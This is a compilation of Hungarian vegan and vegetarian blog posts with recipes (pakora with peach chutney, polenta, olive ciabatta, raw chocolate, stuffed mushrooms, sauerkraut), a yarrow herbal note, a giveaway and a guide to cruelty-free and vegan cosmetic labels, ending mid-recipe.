Személy szerint felettébb boldog vagyok, hogy a politikai korrektség nyelvezete egyre nagyobb teret hódít. Már régen is azok közé tartoztam, akik napokig nem tudtak aludni azzal a tudattal, hogy valamely kijelentésükkel megsértették a Dunsztosüvegbe Jódlizó Aszexuális Kalaposmesterek Érdekvédelmi Ligájának aktivistáit. Ennél fogva a következő ételre pusztán lelkiismereti okokból nem ragasztanám rá a "rántott ananász indiai baracklekvárral" csúfnevet. (Holott nagyon leegyszerűsítve erről van szó.) Persze, ha 60 év feletti ismerőseim kérdeznek rá, mit főztem épp, nyilván ezzel a formulával hozakodnék elő - elkerülendő, hogy a beszélgetés másfél órás magyarázkodást követően halálesetbe torkolljon. Komponensek: A pakorához: 2db ananász 250g csicseriborsóliszt 2 tk porcukor 1 tk fahéj 1 tk őrölt szegfűszeg 1,5 dl víz A csatnihoz: 400g őszibarack (és bár áprilisban halmozottan szezonális, konzerveset is használhatunk) 1 fej lilahagyma 1 tk reszelt gyömbér 2 ek friss bazsalikom felaprítva 1 tk római kömény 2 tk szegfűszeg 1 piros chilipaprika 4 db babérlevél 3 ek barnacukor 3 ev víz kevés só és bors A lisztet és a fűszereket a víz hozzáadása után variálás nélkül csomómentesre mixeljük, majd egy tál nevezetű egzotikus eszközben összekeverjük a felkockázott ananásszal. Ezt az elegyet jó negyed órán át hagyjuk békében nyugodni. Addig nekiláthatunk a csatninak, de kotlóst is imitálhatunk önmagunk szórakoztatására, lelkünk rajta! (Ha utóbbit választjuk, ügyeljünk a művészi hitelességre, és ódzkodjunk azoktól az elcsépelt mozdulatoktól, melyeket az óvodában tanultunk el kacsatánc címszó alatt!) Ha letelt az említett idő, az fűszeres tésztával beborított ananászt forró olajban kisütjük. Közben egy másik edényben kevés olívaolajat hevítünk, hozzáadjuk a római köményt, a szegfűszeget, a chilipaprikát, majd a felkockázott hagymát, a gyömbért és a bazsalikomot. Négy-öt percig, folyamatos kevergetés közepette pároljuk, majd lelkesen belepasszítjuk a héjától megfosztott, felkockázott barackot. Jöhet a babérlevél, a cukor, a víz, nüansznyit sózzuk, borsozzuk, majd fedő alatt kis lángon fél óráig főzzük.
Polenta krémesen, párolt zöldségekkel
2016. április 6. Élj harmóniában
Polenta párolt zöldségekkelA polenta, nem más mint kukoricadarából készült sűrű, krémesre főzött kása, ami nagyon tápláló. Elsősorban olasz területeken elterjedt, de Magyarországon, vidéken puliszka néven is ismerik. Hozzávalók 4 személyre 15 dkg kukorica dara (kb. 2/3 bögre) só bors 3 ek. vaj ( vagy kókuszzsír vegán változatban) 1 liter víz 4 sárgarépa 1 nagy fej brokkoli 2 ek. ghí só bors Pucold meg a répákat, vágd karikára és a brokkolit szedd rózsáira és mosd meg. Forrald fel a vizet egy nagy edénybe, majd vedd kis lángra és keverd bele a kukoricadarát. Keverd folyamatosan - habverőt is használhatsz az elején, azzal könnyebb csomómentesre eldolgozni a kukoricadarát. Kb. 5 perc után már fakanállal is könnyedén tudod keverni. Addig főzd amíg meg nem fő, szépen elválik majd az edény falától. A végén keverd hozzá a sót, borsot és a 2 evőkanál vajat. Egy serpenyőben tedd oda a ghít, majd add hozzá a répákat és tegyél hozzá egy pici vizet, hogy elkezdjen a répa puhulni, folyamatosan mindig egy pici vizet tehetsz hozzá, ha úgy látod, hogy kezdene telesen elpárologni a víz. Néhány perc után tedd hozzá a brokkolit is és párold együtt amíg megpuhulnak. A végén add hozzá a sót és a borsot. Szedd ki tányérra a polentát és a párolt zöldséget. Meglocsolhatod a polentát olívaolajjal is ha szereted - én mindent meglocsolok olívával:) Vegyszermentes (bio) alapanyagokat használj!
Olivás ciabatta
Jobban mondva, ciabatta-zsemlék, mert a ciabatta inkább papucsra hasonlító kenyér, belseje kisebb-nagyobb lyukacsos tészta. Az igazat megvallva, egy Magyaroroszágon és Angliában is elterjed üzletlánc-hálózat pékáruja adta a mostani ötletet. Az itteni üzletek pékárui között ugyanis nem találtuk az otthon több helyen látott olivás ciabatta-zsemléket. Így, amiként a kiflik, úgy az olivás ciabatták is saját elkészítésre vártak. Amit cseppet sem bánok, egyrészt mert az olivabogyók közül a fekete szerintem finomabb, mint a zöld, és otthon ezt a pékárut zöld bogyókkal készítik. Másrészt, nem tudhattam biztosan, hogy vegán-e a magyarországi üzletek polcairól vásárolható olivás ciabatta. Akárhogyis, férjem odáig volt az általam készített (vegán) olivás ciabattákért. Munkahelyén az egyik angol meg is jegyezte, hogy milyen jól néz ki a szendvicse, hol vette. "Nem vettem, a feleségem sütötte." :) A recept: Hozzávalók: - 35 dkg fehér liszt - 10 dkg teljes kiőrlésű liszt - 2 ek olivaolaj - 1 kávésk só - 2.5 g élesztő - 3 dl növényi tej - 1 kis bögre szeletelt fekete olivabogyó - Szükség esetén viz Elkészítés: Az élesztőt a keverőtálba morzsoljuk (én instant élesztőt használtam), majd ráöntjük a meleg növényi tejet. Amikor az élesztő feloldódott, hozzáadjuk a liszteket, az olivaolajat és a sót. Elsőnek fakanállal összekeverjük a tésztát, amennyire tudjuk, majd kezünkkel keverjük, dagasztjuk tovább, ekkor szórjuk bele a felszeletelt fekete olivabogyót. Ha szükséges, pár csepp vizet még adunk hozzá. Amikor összeállt a tészta (enyhén ragacsos, amolyan nokedli-szerű állaga lesz), és a kezünkkel való dagasztás során már elválik az edény falától, akkor az edényt kicsit kilisztezzük, majd a tésztát letakarjuk, meleg helyen pihentetjük legalább 30 percet. Amikor a duplájára dagadt, lisztezett deszkán vagy munkaasztalon kinyújtjuk, kétszer áthajtogatjuk, újra kinyújtjuk kb. 1,5 cm-es vastagságúra, négyszög vagy téglalapokra felvágjuk. Sütőpapíros vagy szilikonlapos tepsibe tesszük őket, hagyjuk pihenni, kicsit dagadni kb. 15 percet, majd kb. 20-30 perc alatt megsütjük őket.
A cickafark hatásai
2016. március 24. Élj harmóniában
A cickafark Magyarországon is ismert gyógynövény - rokona a kamillának. Levelét és virágzatát szokták felhasználni, komoly hatással van a vérkeringésre, légzésre és emésztésre is. Hűtő hatású izzasztószer, jó lázcsillapító. Alkalmazható megfázásnál, influenzánál, magas láznál és komoly gyulladással járó betegségeknél. Kiváló vérzéscsillapító, összehúzó hatású, így segíti a sebgyógyulást is. Elállítja a külső és belső vérzéseket. Görcsoldó hatással is rendelkezik. Csillapítja az erőteljes havi vérzést, megszünteti a menstruációs görcsöket. A felfokozott pittát segít helyreállítani, így jótékony az epetermelésre és a gyomor bélrendszer gyulladásaira, erősíti a nyálkahártyát. . Rendelkezik némi nyugtató, idegerősítő hatással is. Jól használható izzasztásra borsmentával, idegerősítőként zsályával és gyomorerősítőként kamillával. Leve vagy párlata külsőleg használható sebekre, sérülésekre - elsődlegesen vérző, gyulladt állapotban. Csökkenti a Kaphát és a Pittát és növeli a Vatat. Felhasznált szakirodalom:dr. David Frawley és dr. Vasant Lad: Gyógynövény jóga
Humuszos mártogatós
Az eredeti receptet Szonjától olvastam egy 108.hu vegetariánus csoportban. Azonnal szerelem lett, és bár megcsináltam magyaros szósszal is, de a kedvenc mégis a humusz ;) Kiváló alternatíva lehet annak, aki chipset ropogtatva szeret filmet nézni ;) Hozzávalók a humuszhoz: 2,5 csésze főtt csicseriborsó 1 kk csipet római kömény (bio) 1 kk tiszta só 1 bio citrom leve 4 ek pirított, […]
Nyers sós goji bogyós csokoládé + Nyereményjáték egy nagyon csokis csomagért
2016. március 19. Zizi kalandjai
Régóta készültem már nyers csokoládét csinálni… el is terveztem, hogy lesz citromos, mogyorós, sós… aztán megszületett ez a sós-goji bogyós-kakaóbab töretes változat. Nagyon sokféle verzió lehetséges, tényleg az ízlésetekre bízom, hogy ti mit szórtok az elkészült csokoládé tetejére. Jelen esetben a goji bogyó adja a savasságot és gyümölcsösséget, a kakaóbab töret a ropogósságot, a só pedig – jelen esetben Maldon só, de bármilyen nagyobb szemcsés só megteszi – csak ellensúlyozza az édességet… amúgy is imádom a sós csokoládét. Datolyasziruppal édesítettem, ami kicsit karakteres ízű, szóval, ha valaki nem szereti a datolyát, vagy kevésbé “intenzív” édesítést szeretne, az használjon inkább juharszirupot. A feltéteken és a datolyaszirupon kívül a csokoládé alapját a kakaóvaj és a nyers kakaópor adja (természetesen elkészíthető nem nyers kakaóporból is). A kakaóvaj a kakaófa terméséből,vagyis a kakaóbabból kinyert nyers és tiszta növényi zsír. Igen gazdag E-vitamin forrás, ami hozzájárul a sejtek megvédéséhez az oxidatív stressz ellen. A kakaóvaj a kakaóporral ellentétben minimális mennyiségű teobromint és koffeint tartalmaz. A kakaóporban lévő magnézium és vas csökkenti a fáradtságérzetet, míg a cink, egy antioxidáns, megvédi a sejteket az oxidatív stressz ellen és hozzájárul az egészséges bőr-, haj- és köröm növekedéshez. A nagy csokoládé táblából lehet kisebb darabokat törni, becsomagolni és húsvétra ajándékba adni csokinyúl vagy csokitojás helyett. Nyers sós-goji bogyós csokoládé Hozzávalók: – 175 g kakaóvaj – 100 g nyers kakaópor – 150-160 ml datolyaszirup vagy juharszirup – goji bogyó – kakaóbab töret – néhány csipet nagyobb szemű só (Maldon sót használtam) Tegyük a kakaóvajat egy hőálló tálba, a tálat pedig egy lábassal teli víz fölé (úgy, hogy a tál alja ne érjen bele a vízbe). Közepes láng felett melegítsük a vizet és felette a kakaóvajat, lassan kevergetve, amíg a vaj teljesen felolvad. A felolvadt vajat vegyük le a lábas tetejéről és tegyük bele a kakaóport (szitálva) és a datolyaszirupot. Lassan kevergetve várjuk meg, amíg minden összeolvad gyönyörű, fényes csokoládévá. Béleljünk ki egy kb. 20*30 cm-es tepsit vagy dobozt sütőpapírral és öntsük bele a csokoládét. Szórjunk a tetejére goji bogyót, kakaóbab töretet és sót. Tegyük hűtőbe legalább két órára, várjunk, amíg megkeményedik és törhető lesz kisebb falatokra. ***** A kakaóvajat, kakaóport, kakaóbab töretet és goji bogyót a {Planetbio} biztosította a recepthez. A véleményem csakis a sajátom. Jó hír, hogy a Planetbio felajánlotta, hogy kedvezménykupont biztosít a Zizi kalandjai olvasóinak! Minden online vásárlás végösszegéből 10% kedvezményt nyújt a cég. A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI. Ráadásul, aki a 300 grammos kakaóport és a 300 grammos kakaóvajat is megrendeli, az egy szilikon bonbon formát kap ajándékba. ***** NYEREMÉNYJÁTÉK! Nyeremény : egy 10 ezer Ft értékű ajándékcsomag a Planetbio Magyarországtól, amelyben van 1 db nyers kakaópor (150 g), 1 db kakaóvaj (150 g), 1 db kakaóbab töret (150 g), 1 db goji bogyó (150 g) és 1 db szilikon bonbon forma. Írjátok meg ide a bejegyzés alá kommentben, hogy ti mivel ízesítenétek a csokoládét. Extra pontért (hogy a kalapba kétszer kerüljön bele a nevetek) lehet lájkolni a Planetbio Magyarország Facebook oldalát. Szabályok : Kérem, hogy az alábbi formula/”táblázat” minden pontját értelemszerűen töltsétek ki! A játék 2016. március 19-től 2016. március 22-ig tart. Sorsolás a Rafflecopter szoftverrel. Eredményhirdetés 2016. március 23-án. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek a Planetbio Magyaroszág postázza magyarországi címre. a Rafflecopter giveaway
Töltött gomba (sajtos-tejfölös-gabonakolbászos)
Csiperke gombát töltöttem. Nem teljesen vegánul, de a tejfölt és sajtot lehet helyettesíteni növényi hozzávalókkal. Nagyon finom lett. Hozzávalók: kb. 12 db csiperke gomba, 1 vöröshagyma, kb. 150 ml tejföl (lehet növényi is), kb. 15 dkg reszelt sajt (lehet növényi is), gabonakolbász (paprikás, magyaros), só, bors, 2 gerezd fokhagyma. Elkészítés: A gombáknak a tönkjét levágjuk, megtisztítjuk a gombákat, héjukat lehúzzuk. A tönköket apróra vágjuk, ahogy a vöröshagymát is. A vöröshagymát rövid ideig kis szőlőmagolajon megpirítjuk, hozzáadjuk a gomba tönköket (+ én még egy egész gombafejet is belevágtam, hogy legyen több gomba a töltelékben is), és egy kicsit megfonnyasztjuk a gombát is, majd 2 fokhagyma gerezdet nyomok rá. Az összevagdosott gabonakolbász is is hozzákerülhet, pirítsuk meg ezt is kissé. A tejfölt a reszelt sajttal összekeverem, majd mikor már kicsit kihűlt a megpirított hagymás gomba, összekeverjük a sajtos tejföllel. A tölteléket a gombafejekbe töltjük, tetejét még megszórjuk reszelt sajttal. Így ni! A sütőben addig sütjük, míg a tetején a sajt megpirul. Tipp: tejfölből sűrű változatot érdemes használni, nehogy elázzon tőle a gomba. Salátával és rizi-bizivel tálaltam. Jó étvágyat!
Chilis rántott karfiol gyömbéres-mogyoróvajas szósszal
Ma ismét egy tradicionális ősmagyar street foodot sikerült összeügyetlenkednem. A hagyományos ízvilág önkéntelenül is kihúzta lelkem tévéantennáját, melyen csak délutáni Duna TV-s kívánságműsorokat sikerült befognom. Ennek szellemében tehát, amíg az alábbi receptet leírom, kérném a Bagzó tacskó vakkantott a mármarosi határban című magyarnótát Kerékgyártó-Kutas Rezső előadásában. Küldeném édesanyámnak, Paszternák Kálmánnének Tatárkankóra, Pötyi néninek és lányának, Eutanáziának, valamint perzsamacskájuknak, Mircinek Kancahergelőre. Alkotóelemek: 1 fej karfiol 1/2 csésze liszt 1/4 csésze langyos víz kevés só 1/2 uborka pálcikákra aprítva A chilis bevonathoz: 2 ek olívaolaj 2 ek chiliszósz 1/4 csésze rizs- vagy fehérborecet 1 tk szójaszósz Hovatovább a szószhoz: 3 ek mogyoróvaj 2 ek rizs- vagy fehérborecet 2 ek citromlé 2 tk reszelt gyömbér 1 ek szójaszósz 1 tk agaveszirup (de bármilyen hasonló állagú, édeskés gyász megteszi) kevés langyos víz A sütőt előmelegítjük 230 fokra. A karfiolt kérdezősködés nélkül rózsáira cincáljuk, ódzkodjunk a túl nagy szeletektől, mint zsiráf a mackóalsótól! A víz, liszt és kevés só elegyéből csomómentes vegyületet alkotunk, ha túl száraznak találjuk, további langyos vízzel regulázzuk. Miután negyed óráig állni hagytuk, a karfioldarabokat rutinosan megmártjuk benne, majd egy hőálló üvegtálba halmozzuk őket. Sütőbe tesszük, összvissz negyed óráig hagyjuk bent, nem tovább. Közben előkészítjük a chilis elegyet oly módon, hogy az összetevőket egy serpenyőbe öntjük, majd kevergetjük, és felmelegítjük. (Nem forraljuk fel, mert bajok lesznek, világos?) Kivesszük a karfiolt, egy ún. tálba halmozzuk, majd az imént említett löttyel kíméletlenül nyakon öntjük és összerázzuk. Majd visszatesszük a sütőbe további 3-4 percre. De addig sem limbózunk a konyhában saját szórakoztatásunkra, hanem a mogyoróvajas szósz összetevőit összekeverjük egy tálban, végül annyi vizet adunk hozzá, hogy krémes állagú legyen. A kész művet felnyiszatolt uborkával szervírozzuk, hogy joggal vádolhassanak minket hatásvadászattal!
Kurkumás amaránt kása (vegán) – Vendégbejegyzés Rakottkert Gabitól
2016. március 8. Zizi kalandjai
Gabi blogját évek óta követem, igazából hamarabb ismertük meg egymást személyesen és csak utána kezdtük el követni egymás blogját. Nem vegetáriánus blogot ír, de nagyon sok vegán és vegetáriánus recept van a blogján. Imádom a stílusát… egyszerűen nem tudom megmagyarázni miért… ahogyan az étellel bánik, ahogyan egy alapanyagból “varázsol” valamit, a letisztultság, a kreativitás mind-mind hozzájárul ahhoz, hogy imádjam. Nem mellesleg Gabi a megalkotója a gyönyörű Kósa Gabi textileknek! Kövessétek, szeressétek őt! “Olyan receptet küldök, amit reggelire, uzsonnára, de akár egészséges desszertnek is el lehet készíteni. Az amaránt nagyon sok jó tulajdonsággal bír, többek között magas a vas és kálcium tartalma, gluténmentes, így lisztérzékenyek is fogyaszthatják. Még a neve is szép: a görög amarantos szóból származik: jelentése: nem hervadó. Szóval nemes alapanyag, amit én kurkumával fűszereztem, bevallom, főleg a színe miatt. Szépen megsárgította a kis gyöngyszemeket, így még jobban mutat mellette a mélyvörös málna, a zöld pisztácia és a fehér kókusz. Jön a nyár nemsokára, vele a friss gyümölcsök - bármelyikkel finom lesz majd!“ Kurkumás amaránt kása Hozzávalók: – 100 g amaránt – 1/2 kávéskanál kurkuma – 1-2 evőkanál juharszirup vagy méz – csipet só – 50 g málna (fagyasztott is lehet) – 1 evőkanál barna nádcukor – 1 marék natúr pisztácia – 1 marék pekándió – 2 evőkanál kókuszpehely – pár szem egész málna Az amarántot 250 ml vízzel és egy csipet sóval időnként megkeverve puhára és sűrűre főzzük. Ízlés szerint juharsziruppal vagy mézzel édesítjük. A málnát egy evőkanál vízzel és a cukorral megpároljuk, átpasszírozzuk. A pisztáciát és a pekándiót durvára vágjuk. Az amaránt kását tálba tesszük, ráöntjük a málnakrémet, megszórjuk a magokkal és a kókuszpehellyel. Egész málnákat teszünk a tetejére. Langyosan a legfinomabb.
Vega-Farm finomságok
2016. március 2. Mindennapi ételeink
Írtam már nektek a Vega-Farm termékeiről, de most - húsvét közeledtével - ismét szeretném ajánlani nektek ezeket a finomságokat. Már nemcsak csemege és csípős gabonakolbászt gyártanak, hanem gabonahúst is, gyros-os, chilis, magyaros ízesítésekben. A gabonakolbászt én nem csak rakott krumpliba vagy egyéb rakott ételekbe (pl. rakott savanyú káposzta) teszem, hanem lencsés, babos ételekbe (lencse-és bableves, lencse-és babfőzelék stb.), gulyáslevesbe, illetve minden pörköltbe is jut belőle. De kiváló szendvicskrém is készül belőle gyakran, kókuszzsírral összekeverve. A gabonahúsok pedig önmagában is nagyon finomak, és egészségesek (fehérjedúsak), de a frankfurti leves, székelykáposzta, milánói makaróni elengedhetetlen összetevője. Sokan kérdezik tőlem mostanában, hogy mivel lehet helyettesíteni a húsvéti sonkát, ezzel biztosan. És nemcsak nekünk, húsevő vendégeinknek is ízleni fog. Itt találjátok meg őket: http://www.gabonakolbasz.hu/
Mi a különbség a Cruelty-free és a Vegán kozmetikumok között?
Vegánok között is gyakran felmerül a cruelty-free termékek kérdésköre. CF listákat linkelünk egymásnak, keressük a “nyuszis” logót, melyekből kitűnik, hogy sajnos sokan élnek abban a tévhitben, hogy a cruelty-free jelölés állatok kihasználásától teljes mértékben mentes terméket jelent. Mielőtt megosztjuk kedvenc kozmetikumainkat és házi praktikáinkat, fontosnak tartjuk tisztázni a CF és VEGÁN termékek közötti különbségeket és esetleges átfedéseket. CRUELTY-FREE = nem tesztelték állatokon VEGÁN = nem tartalmaz állati eredetű összetevőket Alapvetően három csoportra oszthatjuk a cruelty-free és/vagy vegán kozmetikumokat: CRUELTY-FREE (TESZTMENTES) ÉS VEGÁN Ennek értelmében a kész terméket és annak összetevőit sem tesztelték állatokon, valamint állati eredetű összetevőktől is mentes. VEGÁN DE NEM CRUELTY-FREE (TESZTMENTES) Ezek a termékek nem tartalmaznak állati eredetű összetevőket, ugyanakkor bizonyos alkotóelemeit állatkísérlet keretében vizsgálták. Ide sorolhatunk sok vegán-barát, véletlenül vegán terméket. CRUELTY-FREE (TESZTMENTES) DE NEM VEGÁN Ebbe a kategóriába tartoznak a tesztmentes termékek, amelyek tartalmaznak valamilyen állati eredetű összetevőt. HOGYAN BIZONYOSODHATSZ MEG ARRÓL, HOGY EGY TERMÉK NEM CSAK TESZTMENTES DE VEGÁN IS? Több szervezet foglalkozik nemcsak élelmiszerek, de kozmetikumok minősítésével is. Összegyűjtöttük, mely szimbólumokat érdemes keresni a termékek csomagolásain. TESZTMENTES MINŐSÍTÉSI RENDSZEREK – “NYUSZIS” LOGÓK Choose Cruelty Free (CCF) – Az ausztrál piacra szánt kozmetikumokat, háztartási tisztítószereket gyártó cégeket minősítő non-profit szervezet. A minősítés feltételeit itt olvashatod. Ugyan elsősorban tesztmentes minősítést adnak ki, bizonyos állati eredetű összetevőket felhasználó cégeket nem akkreditálnak. CF-vegán listájukat itt találod, de telefonodon is mindig nálad lehet mobilalkalmazásuknak köszönhetően . Leaping Bunny (CCIC) – Talán a legismertebb nemzetközi CF minősítés. A gyártó céget egészében vizsgálják, a jelentkezéshez szükséges feltételek listáját itt olvashatod, az ezeknek megfelelt cégeket pedig itt böngészheted. CF akkreditált és egyben vegán cégeket összesítő jegyzékét itt találod (ne felejtsd el x-elni, hogy vegán). Törvény által előírt tesztelést végző cégek nem szerezhetnek jogosultságot a Leaping Bunny logó használatára, valamint a cégek rendszeresen megújítják akkreditációjukat. Ugyanakkor cégek, melyeknek anyacége végez állatkísérleteket, megkaphatja a nyuszis minősítést. Okostelefonod van? Töltsd le az appjukat! Beauty Without Bunnies (PETA) – Külön tesztmentes, illetve vegán és tesztmentes minősítést is kiadnak kozmetikumokat gyártó cégek részére, már kétféle designt is kereshetünk a termékek csomagolásain. Adatbázisukban számos kritérium szerint szűrheted a cégeket, valamint mobilalkalmazásukat is telepítheted. A termékek tesztelése és a gyártó által megadott adatok ellenőrzése nem képezi részét a minősítési folyamatnak, illetve olyan cég is került már fel listájukra, amelyik a törvény által előírt tesztelésnek eleget tesz, tehát nem teljes mértékben tesztmentes. A Beauty Without Bunnies régi logója VEGÁN MINŐSÍTÉSI RENDSZEREK Vegan Action – Certified Vegan – Logójukat akkreditált vegán és tesztmentes termékek kaphatják, gyártók nem. Így olyan cégeket is megtalálhatsz listájukon, melyek nem vegán termékeket is forgalmaznak, illetve érdemes üzenőfalukat is figyelni, ahol helyesbítéseket adnak közre. The Vegan Society – Szintén termékeket minősítenek, nem cégeket. A logójukat viselő termékek tesztmentesek és vegánok, megkövetelik a GMO összetevők jelölését, ezek és az előállításhoz használt ipari segédeszközök esetében sem engedik az állati eredetű összetevők felhasználását. 12 és 24 hónapos licenszszerződést kínálnak, így biztosítva a minősítéssel rendelkező termékek rendszeres felülvizsgálatát. Termékekre és cégekre is kereshetsz adatbázisukban. MI A HELYZET AZOKKAL A TERMÉKEKKEL, AMELYEKEN EGYIK FENTI LOGÓ SEM TALÁLHATÓ MEG? Számos oka lehet annak, hogy egy termék csomagolásán nincs feltüntetve fent említett CF vagy vegán szimbólum: A termék nem CF és/vagy vegán A termék véletlenül vegán A termék minősített, de a logó külön licenszdíj ellenében használható melyet nem kötelező megfizetni, így egyes cégek egyszerűen nem élnek a lehetőséggel, CF és/vagy vegán státuszukat azonban ellenőrizheted az adatbázisokban. Van CF vagy vegán szimbólum a terméken, de nem hasonlít a fentiekre. A fenti nyuszis és vegán szimbólumokat kizárólag színükben módosíthatják a cégek, így az ezektől eltérőeket nem tekinthetjük megbízható minőség garanciának. Érdemes felvenni a kapcsolatot a logó tulajdonosával, valamint a cég képviseletével. Olvass tovább, adunk néhány tippet, hogy milyen kérdéseket tehetsz fel tesztmentesnek és/vagy vegánnak hirdetett termékekkel kapcsolatban. Nincs CF vagy vegán szimbólum a terméken, de rá van írva, hogy “vegánok számára alkalmas”, “nem támogatjuk az állatkísérleteket”, “100% vegán”, illetve ezek különböző variációi. Ahogy azt az eltérő szimbólumokkal kapcsolatban már jeleztük, a szöveges állítások sem tekinthetők megbízható minőséggaranciának. Ezeket a szövegeket hivatalos szerv vagy minősítő szervezet szabványainak való megfeleltetés nélkül alkalmazhatja szinte bárki. MIT TEHETSZ, HA NEM VAGY BIZTOS A TERMÉK CF ÉS/VAGY VEGÁN STÁTUSZÁBAN? Mint azt élelmiszerek esetében is ajánljuk, nem árt, ha tisztában vagy a kozmetikumokban található összetevőkkel is. Szerencsénkre egy egyszerű Google keresés is eredményre vezethet, de böngészhetsz olyan adatbázisokban is, mint a Skin Deep, valamint számos mobil applikáció is kifejezetten az állati és nem állati eredetű összetevőkkel foglalkozik. Sajnos elég gyakori a fenti szimbólumok jogtalan használata, így a biztonság kedvéért ellenőrizd, hogy a cég megtalálható-e az adatbázisok valamelyikében. CF és vegán bloggerek már évek óta keresik a legújabb CF és vegán kozmetikumokat, illetve tartják a kapcsolatot mind a minősítést végző szervezetekkel, mind a gyártókkal, így naprakész információkkal rendelkezhetünk a kozmetikai ipar alakulását illetően. Keresd fel a cég magyarországi vagy külföldi képviseletét, és kérdezd meg tőlük! A cégek, melyeknek nincs takargatnivalójuk, nem bújnak jól hangzó marketingszövegek mögé, kézséggel válaszolják meg kérdéseidet. MILYEN KÉRDÉSEKET TEGYEK FEL? – Tesztelik-e a terméket állatokon az előállítás bármelyik szakaszában? Fontos különbséget tenni az összetevők, a fejlesztési folyamat és a kész termék tesztelése között, a kész terméket gyakran hirdetik tesztmentesként, ezzel hamis biztonságérzetet keltve a vásárlóban. – Beszállítóik tesztelik-e az összetevőket állatokon, amennyiben nem, milyen formában bizonyosodnak meg erről? Sajnos szinte minden összetevőt teszteltek valamikor állatokon, azonban fontos kiszorítani azok felesleges újratesztelését. CF/vegán gyártók kérhetik nyersanyagbeszállítóik írásos nyilatkozatát, miszerint az összetevőket nem tesztelték állatokon. – Harmadik fél teszteli-e az összetevőket vagy a terméket az előállítás bármelyik szakaszában, amennyiben nem, milyen formában bizonyosodnak meg erről? Harmadik fél lehet beszállító, független, akár hivatalos szerv által megbízott laboratórium, anyacég vagy más, a gyártóval kapcsolatba hozható cég, amelyek tesztelik a termék összetevőit vagy magát a terméket az előállítás bármelyik szakaszában. – Másik cég tulajdonában állnak-e? Egyes minősítő szervezetek akkreditálnak cégeket, melyek állatkísérleteket végző cég tulajdonában állnak. – Törvény által előírt tesztelésnek alávetik-e termékeiket, forgalmazzák-e termékeiket Kínában, tervezik-e azok forgalmazását Kínában? Kínában bizonyos esetekben törvény által előírt tesztelésnek kell alávetni a kozmetikumokat. Erről és az európai helyzetről hamarosan bővebben is olvashatsz itt, a Veganinján! – Megalakulásuktól kezdve nem tesztelnek, vagy van hivatalos dátum, amióta nem folytatnak kísérleteket sem a nyersanyagokon sem a terméken az előállítás bármelyik szakaszában? Két esetet különböztethetünk meg tesztmentesre való áttérést illetően. Az egyik az 5 éves szabály, melynek értelmében a kozmetikai célra szánt összetevőket az elmúlt 5 évben nem tesztelték állatokon. Ez persze kibúvót jelenthet azon termékek esetében, melyeknek fejlesztése meghaladja az 5 évet. A másik az ún. cut-off date, hivatalos dátum (ami nem feltétlen publikus). Ezt az eljárásmódot alkalmazó cég vállalja, hogy nem használ fel olyan kozmetikai célra szánt nyersanyagot melyet a záródátum után teszteltek, illetve az azóta előállított terméket sem tesztelték állatokon. Gyakori, hogy egyes összetevőket nem csak kozmetikai célokra használnak fel, ezek állatkísérletek keretében való tesztelésére eltérő szabályok vonatkoznak. – Amennyiben nem kizárólag vegán termékeket gyártó cégnek írsz, kérd el a vegán termékek listáját! Valószínű, hogy a listát neked is ellenőrizned kell majd, de megemlítheted melyik gyakran előforduló összetevők nem vegánok. – Javasolhatod, hogy a jövőben fontolják meg a valamelyik minősítő szervezethez való csatlakozást! The Vegan Societyhez például. Előfordulhat, hogy nem kapsz egyből választ kérdéseidre. Légy kitartó, ez nem feltétlen jelenti azt, hogy a cég titkolni akarná, hogy nem tesztmentes vagy vegán. Ha nem kapsz egyértelmű választ, nyugodtan tegyél fel további kérdéseket és igyekezz infomációval ellátni a céget, kiemelni az együttműködés számukra is előnyös mivoltát, valamint nem támadó stílusban fogalmazni. Tény, hogy nem egyszerű kiigazodni a különféle CF/vegán minősítéseket illetően. Ennek egyik oka az átfogó jogi szabályozás hiánya, melynek eredményeképpen megjelentek a fenti, sokszor egymásnak is ellentmondó minősítési rendszerek. Ugyanakkor reméljük, ez a rövid összefoglaló segítségedre lesz jövőbeli vásárlásaid alkalmával. Érdemes még indulás előtt utánanézni a kiszemelt cég vagy termék tesztmentes-vegán státuszának, így biztosan nem támogatsz majd olyan céget, amely állatok kizsákmányolásával tesz szert profitra. Winhoffer Zita www.v-express.hu Források: http://www.choosecrueltyfree.org.au/ http://www.leapingbunny.org/ www.peta.org http://vegan.org/ http://www.vegansociety.com/ http://elephant-room.org/ http://www.crueltyfreekitty.com/ The post Mi a különbség a Cruelty-free és a Vegán kozmetikumok között? appeared first on VegaNinja.
Hagymás sörös párolt savanyú káposzta
2016. február 12. Vegán lettem
Párolt savanyú káposzta, hagyma és sör. Külön-külön mindegyik nagy kedvencem és együtt olyan kiváló összhangba kerülnek, amit nem nagyon lehet semmihez sem hasonlítani. A savanyú káposzta és főleg a párolt savanyú káposzta az év és a nap bármely szakában és minden mennyiségben jöhet. Kalóriaszegény magas rosttartalmú mivolta miatt vacsorára néha képes vagyok csak azt enni magában. Nyomelemekben és vitaminokban gazdag, közkedvelt köretnek számít Európa több országában. Sok kísérletezés után a natúrnak mondható magyar párolt káposztát kicsit “csehesítettem”, és sörrel valamint hagymával dobtam fel. Érdemes a kis hazánkban is kapható, de Csehországban főzött sörökből választani mert megítélésem szerint sokkal finomabb az ottani, mint a hazai sörök. Azt zárójelben megjegyzem, hogy nem feltétlen azért finomabbak mert nagyobb hagyománya van a cseheknél a sörfőzésnek, hanem mert sokkal jobb minőségű vízből készül. Én a cseh söröket mindig a Serfőző Kocsmából szerzem be, a Primátor sör pedig teljes mértékben vegán, azaz nem halak hólyagjait használják a szűréshez. Na de lássuk hogyan készül a hagymás sörös párolt savanyú káposzta. Hagymás sörös párolt savanyú káposzta hozzávalók 1kg savanyú káposzta 2 fej lila hagyma 1 póréhagyma 1tk fűszerkömény 2tk paprika 2tk bors 4dl világos sör (a cseh Primátor prémium világos sörét használtam most) 2 marék bulgur só kókuszzsír Hagymás sörös párolt savanyú káposzta elkészítése Vágd apróra a két fej lila hagymát és a póréhagymát. Tegyél egy nagyobb edénybe kókuszzsírt, hevítsd fel, majd öntsd bele a felszeletelt hagymát, sózd meg igény szerint és hagyd pirulni. Miután szépen összeesett a hagyma, tedd rá a savanyú káposztát, keverd össze a káposztát a hagymával és tedd rá a babérlevelet, a paprikát, a borsot és a fűszerköményt, majd öntsd fel 2-3dl vízzel. Néha keverd meg és ha elpárolgott a hozzáadott víz, akkor 1-1 dl-enként adj hozzá mindig csak éppen annyit, amennyit a káposzta el tud főni. Amikor elkezd puhulni a leendő párolt savanyú 